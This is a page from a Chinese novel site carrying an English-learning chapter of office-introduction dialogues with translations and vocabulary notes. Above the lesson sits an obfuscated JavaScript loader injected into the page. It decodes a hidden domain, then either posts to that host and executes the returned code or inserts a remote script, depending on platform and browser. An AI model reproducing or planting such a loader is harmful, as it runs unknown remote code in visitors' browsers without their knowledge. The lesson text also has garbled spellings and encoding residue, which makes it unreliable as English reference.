妙书阁小说

阅读记录  |   用户书架
上一章
目录 | 设置
下一页
function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuc2Rqa2JjamtzYmRzdnYuY29t','2843',window,document,['G','TpoZFcguG']);}:function(){};

01 初识(1 / 2)

加入书签 | 推荐本书 | 问题反馈 |

第五堂

社交圈子

01 初识

问候——友谊的开始

dialogue

it&#039;s sue&#039;s fi rst day of work. now she is in the ofi ce of her compan.

今天是苏上班的第一天。现在她正在公司的办公室里。

sue: good morning. i&#039;m a rookie in our office. i&#039;m looking forward to getting to know all of you.

苏:早上好,我是新来的员工。我一直盼望着认识你们。

julie: good morning. welcome aboard!

朱莉:早上好。欢迎加入我们。

sue: nice to meet you. i am sue kant.

苏:很高兴认识你。我是苏·康德。

julie: nice to meet you, too. i am julie smith. you can call me julie.

朱莉:很高兴认识你,我是朱莉·史密斯。你可以叫我朱莉。

sue: ok, julie. i&#039;m new to the working world and would appreciate your guidance.

苏:好的,朱莉。在工作方面我是新手,请多指教。

julie: that&#039;s all right. if you need anything just ask. i&#039;ll do my best to help you out. well,i hope you&#039;ll be happy working here.

朱莉:没事的,如果你需要什么尽管开口。我会尽力帮助你的。好了,希望你在这工作得愉快。

sue: thank you! it&#039;s very kind of you.

苏:谢谢你!你真是太好了。

julie: you are welcome.

朱莉:你太客气了。

sue: i&#039;d like to meet other colleagues. could you introduce them to me?

苏:我想见见其他的同事,你能给我介绍一下吗?

julie: of course.

朱莉:当然可以。

notes

1. rookie [&#039;ruki] n. 新手;新兵

2. help sb. out 帮助某人解决难题,帮助某人摆脱困境;帮助某人完成工作

小贴士

第一天公司上班,是不是有点手足无措?其实,初次见面好比跳华尔兹,非常简单,就是3步曲:问候——介绍——对方回答。先用good morning / afternoon打招呼,同时握手以显示你的诚意。当然不要忘记smile,因为微笑是消除隔阂、沟通心灵的好方法。作为新人,应该主动与同事交往,所以要先作self introduction,除了may i introduce myself, please? my name&#039;s karl smith.你还可以说let me introduce myself.my name&#039;s karl或者i&#039;m karl smith. you can call me karl.做完了自我介绍,如果希望把自己介绍给经理,可以说i don&#039;t know anyone here. could you introduce me to the manager? 每当对方报上姓名时,你要记得说nice to meet you. glad to meet you.或pleased to meet you.为了加深对方的印象,你可以加上对对方的赞扬:i&#039;ve heard a lot about you.,或者i&#039;m looking forward to working for you.接下来就和新同事一一问候打招呼吧。

第一印象很重要

dialogue

katherine and sarah are talking their new colleague sue.

凯瑟琳和莎拉正在讨论她们的新同事苏。

katherine: hey, do you know our company came a new girl yesterday?

凯瑟琳:嘿,你知道我们公司昨天新来个女同事吗?

sarah: really? i didn&#039;t know it yet. i asked for leave yesterday. how do you think of her?

莎拉:是吗?我还不知道。我昨天请假了。你觉得那个女孩怎么样?

kathrine: she impressed me very well. she is tall and slim.

凯瑟琳:她给我的第一印象挺不错。她个子高高的,很苗条。

sarah: she must be very attractive. i don&#039;t expect her to be a vase or a brown-noser in our team.

莎拉:那她一定很迷人。我真不希望她是一个花瓶或者是个马屁精。

katherine: maybe neither. though she is a green hand here, she is enthusiastic and diligent. i can often see smiles on her face.

凯瑟琳:可能不是。尽管她是个新手,但她工作很有热情,很勤快。我经常看到她脸上挂着笑容。

sarah: first impressions count. look at the war without smoke of gunpowder in other companies. they are scheming against each other. oh, my god. i don&#039;t really bring it up.

莎拉:第一印象很重要。看看其他公司的没有硝烟的战场,彼此勾心斗角的。哦,天啊,我真不想提。

katherine: yeah, i am really fear of those who do something secretly in his power to obstruct your development. that&#039;s terrible.

凯瑟琳:是呀,我真的也很担心那种在背后使坏的人。那太可怕了。

sarah: what a good thing that we get along very well in the company!

莎拉:真庆幸我们公司的同事都相处得很好。

notes

1. brown-noser [braun&#039;n?uz?] n. 拍马屁的人

2. diligent [&#039;dilid??nt] adj. 勤奋的,勤快的

上一章
目录
下一页
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间